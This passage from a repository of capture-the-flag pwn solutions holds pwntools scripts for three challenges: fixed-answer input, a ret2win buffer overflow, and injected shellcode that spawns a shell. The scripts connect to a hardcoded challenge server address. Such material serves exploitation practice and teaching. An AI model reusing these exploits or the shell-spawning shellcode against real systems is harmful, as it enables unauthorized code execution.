23 | r.interactive()
24 |
--------------------------------------------------------------------------------
/張元_Pwn-6/pwntools:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-6/pwntools
--------------------------------------------------------------------------------
/張元_Pwn-7/binary:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-7/binary
--------------------------------------------------------------------------------
/張元_Pwn-7/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for binary: three fixed answers (target binary is not in this listing, so their meaning cannot be verified here)
2 |
3 | ip = "140.110.112.77"
4 | port = 2117
5 |
6 | r = remote(ip, port)
7 | # r = process("./binary")
8 |
9 | r.sendlineafter("1", "1048577")  # == 0x100001
10 | r.sendlineafter("2", "100 256 -87117812")
11 | r.sendlineafter("3", str(0x60107C))
12 |
13 | r.interactive()
14 |
--------------------------------------------------------------------------------
/張元_Pwn-8/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for return: 56 filler bytes, a `ret` for alignment, then `win` (target binary is not in this listing)
2 |
3 | ip = "140.110.112.77"
4 | port = 2118
5 |
6 | r = remote(ip, port)
7 | r = process("./return")  # NOTE(review): rebinds `r`; the remote() connection on line 6 is never used or closed — keep only one
8 |
9 | context.arch = "amd64"
10 |
11 | ret = 0x400539
12 | win = 0x4006B6
13 |
14 | payload = b""
15 | payload += flat("a" * 56, ret, win)
16 |
17 | r.sendlineafter(")", payload)
18 |
19 | r.interactive()
20 |
--------------------------------------------------------------------------------
/張元_Pwn-8/return:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-8/return
--------------------------------------------------------------------------------
/張元_Pwn-9/hack.py:
--------------------------------------------------------------------------------
1 | from pwn import *  # solver for shellcode: the service prints a buffer address, and the payload ends with that address (target binary is not in this listing)
2 |
3 | ip = "140.110.112.77"
4 | port = 2119
5 |
6 | context.arch = "amd64"
7 |
8 | r = remote(ip, port)
9 | # r = process("./shellcode")
10 |
11 | addr = int(r.recvline().split()[-1], 16)  # last whitespace-separated token of the first line, parsed as hex
12 | log.info(hex(addr))
13 |
14 | payload = b""
15 | payload += b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05".ljust(120)  # raw machine code padded (with spaces) to 120 bytes; presumes an executable input buffer (no NX) — confirm with checksec
16 | payload += p64(addr)
17 |
18 | r.sendline(payload)
19 |
20 | r.interactive()
21 |
--------------------------------------------------------------------------------
/張元_Pwn-9/shellcode:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/張元_Pwn-9/shellcode
--------------------------------------------------------------------------------